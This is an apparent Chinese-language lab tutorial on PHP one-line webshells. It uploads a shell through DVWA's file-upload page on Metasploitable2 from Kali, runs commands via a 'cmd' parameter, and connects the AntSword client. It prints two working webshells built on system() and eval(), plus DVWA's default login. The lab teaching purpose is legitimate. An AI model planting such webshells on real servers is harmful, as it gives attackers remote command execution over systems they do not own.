php一句话木马（+蚁剑）

一.php一句话木马

一句话木马是一种极简的WebShell，常用于渗透测试中远程执行代码。它通常通过文件上传、代码注入等方式植入目标服务器。

二.实验环境（在同一局域网中）

靶机为Mstasploitable2-linux的DVWA

攻击方为kali，windows

三.构造shell.php

可以直接在桌面上创建文档

写入代码，新建文件shell.php

<?php system($_REQUEST ['cmd']);?>

四.主机查看IP，nmap

五.文件上传

得到靶机IP后，用火狐浏览器登录DVWA

http://靶机ip/dvwa/login.php

登录账号密码为：admin，password

到文件上传窗口

然后知道shell.php在服务器中的位置

六.远程控制

访问路径

http://靶机ip/dvwa/hackable/uploads/shell.php?cmd=ls

七.蚁剑控制

如果要用蚁剑控制的话，得把一句话木马改掉

改完后重新上传文件

<?php @eval($_REQUEST ['cmd']);?>

测试连接，连接成功后保存，可以进行操作了